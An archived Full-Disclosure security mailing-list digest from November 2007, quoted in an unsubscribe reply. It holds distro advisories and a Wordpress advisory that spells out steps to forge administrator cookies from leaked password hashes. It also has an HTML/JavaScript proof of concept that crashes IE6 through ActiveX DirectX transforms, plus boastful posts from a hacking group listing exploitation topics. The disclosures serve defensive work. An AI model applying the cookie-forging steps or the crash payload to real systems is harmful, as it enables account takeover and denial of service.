Date: Mon, 26 Nov 2007 18:54:01 +0100
From: "LT" <lt@....hush.com>
To: <full-disclosure@...ts.grok.org.uk>
Cc: 
Subject: unsubscribe



On Tue, 20 Nov 2007 08:54:18 +0100 full-disclosure-request@...ts.grok.org.uk wrote:
>Send Full-Disclosure mailing list submissions to
>	full-disclosure@...ts.grok.org.uk
>
>To subscribe or unsubscribe via the World Wide Web, visit
>	https://lists.grok.org.uk/mailman/listinfo/full-disclosure
>or, via email, send a message with subject or body 'help' to
>	full-disclosure-request@...ts.grok.org.uk
>
>You can reach the person managing the list at
>	full-disclosure-owner@...ts.grok.org.uk
>
>When replying, please edit your Subject line so it is more specific
>than "Re: Contents of Full-Disclosure digest..."
>
>
>Note to digest recipients - when replying to digest posts, please 
>trim your post appropriately. Thank you.
>
>
>Today's Topics:
>
>   1. [ MDKSA-2007:225 ] - Updated net-snmp packages fix remote
>      denial of service vulnerability (security@...driva.com)
>   2. Wordpress Cookie Authentication Vulnerability (Steven J. Murdoch)
>   3. [ GLSA 200711-28 ] Perl: Buffer overflow (Pierre-Yves Rofes)
>   4. [ MDKSA-2007:226 ] - Updated kernel packages fix multiple
>      vulnerabilities and bugs (security@...driva.com)
>   5. H2HC Materials (Rodrigo Rubira Branco (BSDaemon))
>   6. rPSA-2007-0242-1 php5 php5-cgi php5-mysql php5-pear
>      php5-pgsql php5-soap php5-xsl (rPath Update Announcements)
>   7. Multiple stack-based buffer overflows in dxmsft.dll (Elazar Broad)
>   8. [ MDKSA-2007:227 ] - Updated poppler packages fix
>      vulnerabilities (security@...driva.com)
>   9. [ MDKSA-2007:228 ] - Updated cups packages fix
>      vulnerabilities (security@...driva.com)
>  10. Tha Manual. (rchrafe)
>  11. The Call to Reason (rchrafe)
>  12. Re: How to become a Computer Security Professional ? (rchrafe)
>  13. Re: How to become a Computer Security Professional ? (rchrafe)
>  14. Re: How to become a Computer Security Professional ? (rchrafe)
>  15. Large Scale MySpace Phishing Attack (Dancho Danchev)
>  16. Re: Multiple stack-based buffer overflows in dxmsft.dll
>      (Elazar Broad)
>  17. Re: so gay huh? (rchrafe)
>  18. Re: so gay huh? (rchrafe)
>
>
>----------------------------------------------------------------------
>
>Message: 1
>Date: Mon, 19 Nov 2007 11:12:22 -0700
>From: security@...driva.com
>Subject: [Full-disclosure] [ MDKSA-2007:225 ] - Updated net-snmp
>	packages fix remote denial of service vulnerability
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <E1IuB6c-0001Xp-Fv@...emis.annvix.ca>
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
> 
> _______________________________________________________________________
> 
> Mandriva Linux Security Advisory                         MDKSA-2007:225
> http://www.mandriva.com/security/
> 
> _______________________________________________________________________
> 
> Package : net-snmp
> Date    : November 19, 2007
> Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0,
>           Multi Network Firewall 2.0
> 
> _______________________________________________________________________
> 
> Problem Description:
> 
> The SNMP agent in net-snmp 5.4.1 and earlier allows remote attackers to
> cause a denial of service (CPU and memory consumption) via a GETBULK
> request with a large max-repeaters value.
> 
> Updated packages fix this issue.
> 
> _______________________________________________________________________
>
> References:
> 
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5846
> 
> _______________________________________________________________________
> 
> Updated Packages:
> 
> 
> _______________________________________________________________________
>
> To upgrade automatically use MandrivaUpdate or urpmi.  The verification
> of md5 checksums and GPG signatures is performed automatically for you.
>
> All packages are signed by Mandriva for security.  You can obtain the
> GPG public key of the Mandriva Security Team by executing:
>
>  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
> You can view other update advisories for Mandriva Linux at:
>
>  http://www.mandriva.com/security/advisories
>
> If you want to report vulnerabilities, please contact
>
>  security_(at)_mandriva.com
> 
> _______________________________________________________________________
>
> Type Bits/KeyID     Date       User ID
> pub  1024D/22458A98 2000-07-10 Mandriva Security Team
>  <security*mandriva.com>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.7 (GNU/Linux)
>
>iD8DBQFHQaYcmqjQ0CJFipgRAtwPAKDBmKLrILjPOlBxv0HLu3YwQxbjFACfVRZM
>+tyjwf62Xh9rba65JnJ1RtU=
>=zmEd
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 2
>Date: Mon, 19 Nov 2007 18:46:37 +0000
>From: "Steven J. Murdoch" <fulldisc+Steven.Murdoch@...cam.ac.uk>
>Subject: [Full-disclosure] Wordpress Cookie Authentication
>	Vulnerability
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <20071119184637.GJ1043@...n.cl.cam.ac.uk>
>Content-Type: text/plain; charset="us-ascii"
>
>Wordpress Cookie Authentication Vulnerability
>
>Original release date: 2007-11-19
>Last revised: 2007-11-19
>Latest version: http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-auth.txt
>CVE ID: <pending>
>Source: Steven J. Murdoch <http://www.cl.cam.ac.uk/users/sjm217/>
>
>
>Systems Affected:
>
> Wordpress 1.5 -- 2.3.1 (including current version, as of 2007-11-19)
>
>
>Overview:
>
> With read-only access to the Wordpress database, it is possible to
> generate a valid login cookie for any account, without resorting to a
> brute force attack. This allows a limited SQL injection vulnerability
> to be escalated into administrator access.
>
> This vulnerability is known to be actively exploited, hence the
> expedited public release.
>
>
>I. Description
>
> For authentication, the Wordpress user database stores the MD5 hash
> of login passwords. A client is permitted access if they can present a
> password whose hash matches the stored one.
>
> $ mysql -u wordpress -p wordpress
>   Enter password: ********
>
>   mysql> SELECT ID, user_login, user_pass FROM wp_users;
>   +----+-------------+----------------------------------+
>   | ID | user_login  | user_pass                        |
>   +----+-------------+----------------------------------+
>   |  1 | admin       | 4cee2c84f6de6d89a4db4f2894d14e38 |
>   ...
>
> Of course, entering your password after each action that requires
> authorization would be exceptionally tedious. So, after logging in,
> Wordpress presents the client with two cookies:
>
>  wordpressuser_6092254072ca971c70b3ff302411aa5f=admin
>  wordpresspass_6092254072ca971c70b3ff302411aa5f=813cadd8658c4776afbe5de8f304a684
>
> The cookie names contain the MD5 hash (6092...1a5f) of the blog URL.
> The value of wordpressuser_... is the login name, and the value of
> wordpresspass is the double-MD5 hash of the user password.
>
> Wordpress will permit access to a given user account if the
> wordpressuserpass_... cookie matches the hash of the specified user's
> wp_users.user_pass database entry.
>
> In other words, the database contains MD5(password) and the cookie
> contains MD5(MD5(password)). It is thus trivial to convert a database
> entry into an authentication cookie.
>
> At this point the vulnerability should be clear. If an attacker can
> gain read access to the wp_user table, for example due to a publicly
> visible backup or SQL injection vulnerability, a valid cookie can be
> generated for any account.
>
> This applies even if the user's password is sufficiently complex to
> resist brute force and rainbow table attacks. While it should be
> computationally infeasible to go backwards from MD5(password) to
> password, the attacker needs only to go forwards.
>
> The exploitation steps are therefore:
>  1) Find the hash of the blog URL: Either just look at the URL, or
>     create an account to get a user cookie
>  2) Read the user_pass entry from wp_users table: Look for
>     backups, perform SQL injection, etc...
>  3) Set the following cookies:
>      wordpressuser_<MD5(url)>=admin
>      wordpresspass_<MD5(url)>=MD5(user_pass)
>  4) You have admin access to the blog
>
>
>II. Impact
>
> A remote attacker, with read access to the password database can gain
> administrator rights. This may be used in conjunction with an SQL
> injection attack, or after locating a database backup.
>
> An attacker who has alternatively compromised the database of one
> Wordpress blog can also gain access to any other whose users have the
> same password on both.
>
>
>III. Solution
>
> No vendor patch is available.
> No timeline for a vendor patch has been announced.
>
> Workarounds:
>
> - Protect the Wordpress database, and do not allow backups to be
>   released.
> - Keep your Wordpress installation up to date. This should reduce the
>   risk that your database will be compromised.
> - Do not share passwords across different sites.
> - If you suspect a database to be compromised, change all passwords
>   to different ones. It is not adequate to change the passwords to
>   the same ones, since Wordpress does not "salt" [1] the password
>   database.
> - Remove write permissions on the Wordpress files for the system
>   account that the webserver runs as. This will disable the theme
>   editor, but make it more difficult to escalate Wordpress
>   administrator access into the capability to execute arbitrary code
> - Configure the webserver to not execute files in any directory
>   writable by the webserver system account (e.g. the upload
>   directory).
>
> Potential fixes:
>
>  The problem occurs because it is easy to go from the password hash
>  in the database to a cookie (i.e. the application of MD5 is the wrong
>  way around). The simplest fix is to store MD5(MD5(password)) in the
>  database, and make the cookie MD5(password). This still makes it
>  infeasible to retrieve the password from a cookie, but means that it
>  is also infeasible to generate a valid cookie from the database
>  entry.
>
>  However, there are other vulnerabilities in the Wordpress cookie and
>  password handling, which should be resolved too:
>
>  - Passwords are unsalted [2], leaving them open to brute force, rainbow
>    table and other attacks [3].
>  - It is impossible to revoke a cookie without changing the user's
>    password.
>  - Cookies do not contain an expiry time, so are always valid (until
>    the user's password changes)
>  - There ought to be an option to limit cookies to a particular
>    IP address or range.
>
>
>References:
>
>  [1] http://en.wikipedia.org/wiki/Salt_(cryptography)
>  [2] http://trac.wordpress.org/ticket/2394
>  [3] http://www.lightbluetouchpaper.org/2007/11/16/google-as-a-password-cracker/
>
>
>Timeline:
>
> 2007-10-29: security@...dpress.org notified; no response
> 2007-11-02: security@...dpress.org notified;
>             Confirmation of active exploitation requested by Wordpress
> 2007-11-02: Confirmation sent; no response
> 2007-11-19: Advisory released to full-disclosure and BugTraq
>
>-- 
>w: http://www.cl.cam.ac.uk/users/sjm217/
>
>------------------------------
>
>Message: 3
>Date: Mon, 19 Nov 2007 22:10:42 +0100
>From: Pierre-Yves Rofes <py@...too.org>
>Subject: [Full-disclosure] [ GLSA 200711-28 ] Perl: Buffer overflow
>To: gentoo-announce@...too.org
>Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
>	security-alerts@...uxsecurity.com
>Message-ID: <4741FBD2.5040609@...too.org>
>Content-Type: text/plain; charset=ISO-8859-1
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>Gentoo Linux Security Advisory                           GLSA 200711-28
>- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>                                            http://security.gentoo.org/
>- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
>  Severity: Normal
>     Title: Perl: Buffer overflow
>      Date: November 19, 2007
>      Bugs: #198196
>        ID: 200711-28
>
>- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
>Synopsis
>========
>
>A buffer overflow in the Regular Expression engine in Perl possibly
>allows for the execution of arbitrary code.
>
>Background
>==========
>
>Perl is a stable, cross-platform programming language created by Larry
>Wall.
>
>Affected packages
>=================
>
>    -------------------------------------------------------------------
>     Package        /  Vulnerable  /                        Unaffected
>    -------------------------------------------------------------------
>  1  dev-lang/perl     < 5.8.8-r4                          >= 5.8.8-r4
>
>Description
>===========
>
>Tavis Ormandy and Will Drewry (Google Security Team) discovered a
>heap-based buffer overflow in the Regular Expression engine (regcomp.c)
>that occurs when switching from byte to Unicode (UTF-8) characters in a
>regular expression.
>
>Impact
>======
>
>A remote attacker could either entice a user to compile a specially
>crafted regular expression or actively compile it in case the script
>accepts remote input of regular expressions, possibly leading to the
>execution of arbitrary code with the privileges of the user running
>Perl.
>
>Workaround
>==========
>
>There is no known workaround at this time.
>
>Resolution
>==========
>
>All Perl users should upgrade to the latest version:
>
>    # emerge --sync
>    # emerge --ask --oneshot --verbose ">=dev-lang/perl-5.8.8-r4"
>
>References
>==========
>
>  [ 1 ] CVE-2007-5116
>        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5116
>
>Availability
>============
>
>This GLSA and any updates to it are available for viewing at
>the Gentoo Security Website:
>
>  http://security.gentoo.org/glsa/glsa-200711-28.xml
>
>Concerns?
>=========
>
>Security is a primary focus of Gentoo Linux and ensuring the
>confidentiality and security of our users machines is of utmost
>importance to us. Any security concerns should be addressed to
>security@...too.org or alternatively, you may file a bug at
>http://bugs.gentoo.org.
>
>License
>=======
>
>Copyright 2007 Gentoo Foundation, Inc; referenced text
>belongs to its owner(s).
>
>The contents of this document are licensed under the
>Creative Commons - Attribution / Share Alike license.
>
>http://creativecommons.org/licenses/by-sa/2.5
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.7 (GNU/Linux)
>Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
>
>iD8DBQFHQfvSuhJ+ozIKI5gRAvsEAJ4xdMYdYOWV1neFOchsoCtz3sUtGwCggFQg
>RVShInUYsQgHfjeb1K1xnE4=
>=wi9y
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 4
>Date: Mon, 19 Nov 2007 16:41:14 -0700
>From: security@...driva.com
>Subject: [Full-disclosure] [ MDKSA-2007:226 ] - Updated kernel
>	packages fix multiple vulnerabilities and bugs
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <E1IuGEs-0007rF-PH@...emis.annvix.ca>
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
> 
> _______________________________________________________________________
> 
> Mandriva Linux Security Advisory                         MDKSA-2007:226
> http://www.mandriva.com/security/
> 
> _______________________________________________________________________
> 
> Package : kernel
> Date    : November 19, 2007
> Affected: 2008.0
> 
> _______________________________________________________________________
> 
> Problem Description:
> 
> Some vulnerabilities were discovered and corrected in the Linux
> 2.6 kernel:
> 
> The minix filesystem code allows local users to cause a denial of
> service (hang) via a malformed minix file stream (CVE-2006-6058).
> 
> An integer underflow in the Linux kernel prior to 2.6.23 allows remote
> attackers to cause a denial of service (crash) via a crafted SKB length
> value in a runt IEEE 802.11 frame when the IEEE80211_STYPE_QOS_DATA
> flag is set (CVE-2007-4997).
> 
> To update your kernel, please follow the directions located at:
> 
>   http://www.mandriva.com/en/security/kernelupdate
> 
> _______________________________________________________________________
>
> References:
> 
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6058
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4997
> 
> _______________________________________________________________________
> 
> Updated Packages:
> 
> 
> _______________________________________________________________________
>
> To upgrade automatically use MandrivaUpdate or urpmi.  The verification
> of md5 checksums and GPG signatures is performed automatically for you.
>
> All packages are signed by Mandriva for security.  You can obtain the
> GPG public key of the Mandriva Security Team by executing:
>
>  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
> You can view other update advisories for Mandriva Linux at:
>
>  http://www.mandriva.com/security/advisories
>
> If you want to report vulnerabilities, please contact
>
>  security_(at)_mandriva.com
> 
> _______________________________________________________________________
>
> Type Bits/KeyID     Date       User ID
> pub  1024D/22458A98 2000-07-10 Mandriva Security Team
>  <security*mandriva.com>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.7 (GNU/Linux)
>
>iD8DBQFHQfTKmqjQ0CJFipgRAm4KAJ9vlEIIafxXuBzFtS4lpZ7H98u+OACfeqnj
>6pOfo1qywkIBnd5cQnlOdtM=
>=qX1m
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 5
>Date: Mon, 19 Nov 2007 21:14:15 -0000
>From: "Rodrigo Rubira Branco (BSDaemon)" <rodrigo@...nelhacking.com>
>Subject: [Full-disclosure] H2HC Materials
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <20071119231415.E4DED8BEEB@...l.fjaunet.com.br>
>Content-Type: text/plain; charset="iso-8859-1";
>
>For those who have interest in better know about H2HC conference, the
>presentation materials are now online at
>http://www.h2hc.org.br/repositorio.php
>
>
>
>cya,
>
>
>Rodrigo (BSDaemon).
>
>--
>http://www.kernelhacking.com/rodrigo
>
>Kernel Hacking: If i really know, i can hack
>
>GPG KeyID: 1FCEDEA1
>
>
>
>________________________________________________
>Message sent using UebiMiau 2.7.2
>
>
>
>------------------------------
>
>Message: 6
>Date: Mon, 19 Nov 2007 15:06:46 -0500
>From: rPath Update Announcements <announce-noreply@...th.com>
>Subject: [Full-disclosure] rPSA-2007-0242-1 php5 php5-cgi php5-mysql
>	php5-pear php5-pgsql php5-soap php5-xsl
>To: security-announce@...ts.rpath.com,
>	update-announce@...ts.rpath.com,	product-announce@...ts.rpath.com
>Cc: lwn@....net, full-disclosure@...ts.grok.org.uk,
>	vulnwatch@...nwatch.org,	bugtraq@...urityfocus.com
>Message-ID: <4741ecd6.po1y971Bh5Pxcrhi%announce-noreply@...th.com>
>Content-Type: text/plain; charset=us-ascii
>
>rPath Security Advisory: 2007-0242-1
>Published: 2007-11-19
>Products:
>    rPath Appliance Platform Linux Service 1
>    rPath Linux 1
>
>Rating: Minor
>Exposure Level Classification:
>    Remote Deterministic Denial of Service
>Updated Versions:
>    php5=conary.rpath.com@rpl:1/5.2.5-1-1
>    php5-cgi=conary.rpath.com@rpl:1/5.2.5-1-1
>    php5-mysql=conary.rpath.com@rpl:1/5.2.5-1-1
>    php5-pear=conary.rpath.com@rpl:1/5.2.5-1-1
>    php5-pgsql=conary.rpath.com@rpl:1/5.2.5-1-1
>    php5-soap=conary.rpath.com@rpl:1/5.2.5-1-1
>    php5-xsl=conary.rpath.com@rpl:1/5.2.5-1-1
>
>rPath Issue Tracking System:
>    https://issues.rpath.com/browse/RPL-1943
>
>References:
>    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4887
>    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4783
>    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4840
>    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5898
>    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5899
>    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5900
>
>Description:
>    Previous versions of the php5 package contain multiple vulnerabilities,
>    the most serious of which involve several Denial of Service attacks
>    (application crashes and temporary application hangs).  It is not
>    currently known that these vulnerabilities can be exploited to execute
>    malicious code.
>    
>    In its default configuration, rPath Linux 1 does not install php5 and
>    is thus not vulnerable; however, systems upon which php5 and an exposed
>    application have been installed may be vulnerable.
>
>http://wiki.rpath.com/Advisories:rPSA-2007-0242
>
>Copyright 2007 rPath, Inc.
>This file is distributed under the terms of the MIT License.
>A copy is available at http://www.rpath.com/permanent/mit-license.html
>
>
>
>------------------------------
>
>Message: 7
>Date: Mon, 19 Nov 2007 17:30:32 -0500 (GMT-05:00)
>From: Elazar Broad <elazarb@...thlink.net>
>Subject: [Full-disclosure] Multiple stack-based buffer overflows in
>	dxmsft.dll
>To: "full-disclosure@...ts.grok.org.uk"
>	<full-disclosure@...ts.grok.org.uk>
>Message-ID:
>	<30247048.1195511432439.JavaMail.root@...amui-norfolk.atl.sa.earthlink.net>
>Content-Type: text/plain; charset=UTF-8
>
>There are multiple stack overflows in dxmsft.dll version 
>6.3.2900.3199(Image DirectX Transforms). This DLL exposes DirectX 
>Image Transform objects which are safe for scripting. The issue is 
>with the Color property of certain objects, so I am assuming this 
>property is inherited from a base interface.
>This affects WindowsXP SP2 IE6(fully patched), I have not tested this on
>IE7 and it does not appear to affect Windows Server 2003 R2 
>SP2(newer version of the dxmsft.dll). I have not tested code 
>execution, though it may be possible. I received the following 
>response from Microsoft:
>
>---
>>>From our investigation this issue was found to be a stability 
>problem which is not exploitable. The net effect of this issue is 
>that IE will become unresponsive. The underlying operating system 
>will still respond and Killing the process will stop the local 
>DoS.
>---
>
>It did not hang IE on my machine, but instead crashed IE with a 
>stack overflow. 
>This may be related to http://www.securityfocus.com/bid/19029/.
>
>PoC as follows:
>
>---------------------
><!--
>written by e.b.
>-->
><html>
> <head>
>  <script language="JavaScript" DEFER>
>    function Check() {
>     var s = "AAAA";
>
>     while (s.length < 999999) s=s+s;
>
>    var obj = new ActiveXObject("DXImageTransform.Microsoft.Chroma");
>     obj.color = s;
>
>    var obj = new ActiveXObject("DXImageTransform.Microsoft.DropShadow");
>     obj.color = s;
>
>    var obj = new ActiveXObject("DXImageTransform.Microsoft.Glow");
>     obj.color = s;
> 
>    var obj = new ActiveXObject("DXImageTransform.Microsoft.MaskFilter");
>     obj.color = s;
>
>    var obj = new ActiveXObject("DXImageTransform.Microsoft.Shadow");
>     obj.color = s;
>
>   }
>  </script>
>
> </head>
> <body onload="JavaScript: return Check();" />
></html>
>---------------------
>
>Elazar
>
>
>
>------------------------------
>
>Message: 8
>Date: Mon, 19 Nov 2007 19:12:41 -0700
>From: security@...driva.com
>Subject: [Full-disclosure] [ MDKSA-2007:227 ] - Updated poppler
>	packages fix	vulnerabilities
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <E1IuIbR-0008H5-79@...emis.annvix.ca>
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
> _______________________________________________________________________
> 
> Mandriva Linux Security Advisory                         MDKSA-2007:227
> http://www.mandriva.com/security/
> _______________________________________________________________________
> 
> Package : poppler
> Date    : November 19, 2007
> Affected: 2007.1, 2008.0, Corporate 4.0
> _______________________________________________________________________
> 
> Problem Description:
> 
> Alin Rad Pop found several flaws in how PDF files are handled
> in poppler.  An attacker could create a malicious PDF file that
> would cause poppler to crash or potentially execute arbitrary code
> when opened.
> 
> The updated packages have been patched to correct this issue.
> _______________________________________________________________________
>
> References:
> 
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393
> _______________________________________________________________________
> 
> Updated Packages:
> 
> 
> _______________________________________________________________________
>
> To upgrade automatically use MandrivaUpdate or urpmi.  The verification
> of md5 checksums and GPG signatures is performed automatically for you.
>
> All packages are signed by Mandriva for security.  You can obtain the
> GPG public key of the Mandriva Security Team by executing:
>
>  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
> You can view other update advisories for Mandriva Linux at:
>
>  http://www.mandriva.com/security/advisories
>
> If you want to report vulnerabilities, please contact
>
>  security_(at)_mandriva.com
> _______________________________________________________________________
>
> Type Bits/KeyID     Date       User ID
> pub  1024D/22458A98 2000-07-10 Mandriva Security Team
>  <security*mandriva.com>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.7 (GNU/Linux)
>
>iD8DBQFHQhenmqjQ0CJFipgRAl9SAJ9gU0uhZwFvHZ9tF4z8F15VUgUfNwCgjOhN
>XrZ88C4TwK/FkZL+zC+zOLU=
>=ehqr
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 9
>Date: Mon, 19 Nov 2007 19:23:22 -0700
>From: security@...driva.com
>Subject: [Full-disclosure] [ MDKSA-2007:228 ] - Updated cups packages
>	fix	vulnerabilities
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <E1IuIlm-0008OR-55@...emis.annvix.ca>
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
> _______________________________________________________________________
> 
> Mandriva Linux Security Advisory                         MDKSA-2007:228
> http://www.mandriva.com/security/
> _______________________________________________________________________
> 
> Package : cups
> Date    : November 19, 2007
> Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0
> _______________________________________________________________________
> 
> Problem Description:
> 
> Alin Rad Pop found several flaws in how PDF files are handled in cups.
> An attacker could create a malicious PDF file that would cause cups
> to crash or potentially execute arbitrary code when opened.
> 
> The updated packages have been patched to correct this issue.
> _______________________________________________________________________
>
> References:
> 
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393
> _______________________________________________________________________
> 
> Updated Packages:
> 
> 
> _______________________________________________________________________
>
> To upgrade automatically use MandrivaUpdate or urpmi.  The verification
> of md5 checksums and GPG signatures is performed automatically for you.
>
> All packages are signed by Mandriva for security.  You can obtain the
> GPG public key of the Mandriva Security Team by executing:
>
>  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
> You can view other update advisories for Mandriva Linux at:
>
>  http://www.mandriva.com/security/advisories
>
> If you want to report vulnerabilities, please contact
>
>  security_(at)_mandriva.com
> _______________________________________________________________________
>
> Type Bits/KeyID     Date       User ID
> pub  1024D/22458A98 2000-07-10 Mandriva Security Team
>  <security*mandriva.com>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.7 (GNU/Linux)
>
>iD8DBQFHQhlDmqjQ0CJFipgRAs6VAJ0Z1CEZIWu9sWiiexjGtC+JUXXXMACgo44W
>z5jyh/u/+4QFVsSocymKj/g=
>=RkrY
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 10
>Date: Tue, 20 Nov 2007 07:09:46 +0100
>From: rchrafe <rchrafe@...il.com>
>Subject: [Full-disclosure] Tha Manual.
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <47427A2A.5060905@...il.com>
>Content-Type: text/plain; charset=windows-1252; format=flowed
>
>Tha manual.
>
>
>We do not care about you, or your affiliates.
>We are in position, and a new army has emerged.
>The first of a set of manuals, being provided as follows shall be
>provided wherein those who maintain an interest in the power of the
>simplicity of man.
>The Manual
>Written by d4rk1v4n, part of the rchrafe crime wave.
>Notes: We are the rchrafe, you are pathetic
>You must learn assembly.
>It must be the breakpoint for any other language, high-level or
>low-level and integral learning processes.
>It will be assumed that a thorough course in C Programming and Assembly
>must first commence.
>Also after which a basic, yet thorough understanding of Logic Gates,
>which will be provided as articles following the manual.
>This guide is a perfected manual, crisp with only the intent to create
>an army of elite.
>Simply to intervene.
>Mod 1: Kernel Design
>{
>Operating System Concepts Chapters 1-3 5-13
>Linux Kernel 2.4 Chapters 1-13
>Shellcode
>Stack Overflows
>Format string exploitation
>Integer Overflows
>Race Conditions (files)
>Kernel Exploitation (Linux)
>Kernel patching (Linux)
>Kernel rootkit (Linux)
>linux process patching
>dlmalloc exploitation (partial analysis of 6 thousand line src)
>raw sockets, hping2
>i/o multiplexing
>pthreads
>ELF executable format
>OS Fingerprinting
>IRC Protocol RFC
>SMTP Protocol
>ICMP Protocol
>POP3 protocol
>}
>Mod 2: Algorithms & Data Structures
>{
>Computer Organization Hardware/Software Int. chapters 1-6
>FreeBSD Design And Implementation chapters 1-6, 8, 12, 13
>Algorithms And Data structures (Sedgewick, knuth, whale)
>Linux TCPIP Implementation
>Linux Synchronization analysis
>Linux ext3 analysis
>Linux kmalloc analysis
>Threads
>Mandatory Access Control Models (Selinux,grsec,trustedbsd, dod85)
>Role Based Access Control (rsbac for linux)
>Buffer overflow Protection
>MIPS ASM
>Computer Networks - Tanenbaum
>C++ (full)
>Perl
>phkmalloc exploitation
>advanced dlmalloc exploitation
>advanced fmt string exploitation
>advanced race conditions (double free, etc)
>freebsd kernel exploitation
>freebsd kernel rootkit
>cisco protocols (IGRP, EIGRP, BGP, OSPF, IS-IS)
>TCP RFC
>IP RFC
>IPSEC RFC
>DNS specification
>HTTP specification
>IMAP specification
>SSL 3 specification
>Kerberos
>asynch i/o
>perl exploitation
>php exploitation
>sql injection
>win32 API
>PE executable format
>windows ring 3 hacks
>IDA/Softice work
>binary encryption
>polymorphic shellcode
>WIN DCOM
>ONE RPC Specification
>}
>Mod 3: Large source analysis
>{
>400-500 Thousand lines of src analysis
>Solaris Kernel internals book
>Sparc ASM
>windows kernel analysis & exploitation
>Prolog
>Artificial Intelligence
>Compilers
>SIMD
>ISP Design
>Database Design ISBN: 0321204484
>Sysvmalloc exploitation
>IOS malloc exploitation
>RTL malloc exploitation
>kmalloc exploitation
>ATM
>VPN's
>DecNet
>Cryptography
>Linear algebra
>}
>Level 4: Parallelism, Distributiveness, Diversity
>{
>OpenVMS Scheduler ISBN: 1555581560
>OpenVMS Memory Management ISBN: 1555581595
>Real Time Scheduling Design ISBN: 0387231374
>HP-UX Kernel internals ISBN: 0130328618
>Distributed Operating Systems ISBN: 0132199084
>VHDL ISBN: 0471899720
>Verilog
>Designing a MAC Model (like selinux)
>Designing BOF Protection (like PAX)
>Parallel Architectures
>Parallel Algorithm Design
>Advanced Artificial Intelligence
>Alpha
>PowerPC
>PA-RISC
>ARM
>M68K
>OpenVMS using
>HP-UX using
>Digital Image Processing
>Digital Signal Processing
>Electrical Engineering Basics
>Circuit Board Design
>}
>The rchrafe will resume tutorials of the Mod 1 on the 1st of December
>2007, in the channel #crx under irc.efnet.org/pl/ru
>We will not accommodate stupidity.
>The key will be revealed on rchrafe.wordpress.com at midnight, the 1st
>of december 2007 for all to join!
>
>Well will rise!
>
>
>
>------------------------------
>
>Message: 11
>Date: Tue, 20 Nov 2007 07:13:02 +0100
>From: rchrafe <rchrafe@...il.com>
>Subject: [Full-disclosure] The Call to Reason
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <47427AEE.2060404@...il.com>
>Content-Type: text/plain; charset=windows-1252; format=flowed
>
>"The Call to Reason."
>By the rchrafe Senior seat of officials.
>BEHOLD AND WITNESS, those who read this document, this which
>is the official PROCLAMATION and LETTER OF INTENT concerning
>the future of RCHRAFE and RCHRAFE member states; the words within
>are no less than the movement of RCHRAFE from its widely
>admired position in the computer underground to an overt
>existence as a world renowned hacking into computer machines authority.
>REGARDING the current social state of hacking into computer
>machines, RCHRAFE takes no stance. As an autonomous body
>with goals unrelated to what is largely considered "the
>hacking community", RCHRAFE recognizes no entities nor social
>classes other than RCHRAFE and anti-RCHRAFE. Abstract concepts
>such as "black hat" and "white hat" do thus not exist in
>the lexicon of RCHRAFE politics, and are irrelevant to our goals.
>What then, are the goals and motivations of this powerful
>force that has developed over the years, that has come
>to be known as RCHRAFE? No less than the subjugation of
>power in the computer machine community. It is at this
>time appropriate to state COMMUNIQUE POINT NUMBER ONE:
>"RCHRAFE DOES NOT AFFILIATE IN CONCEPT WITH ANY EXISTING
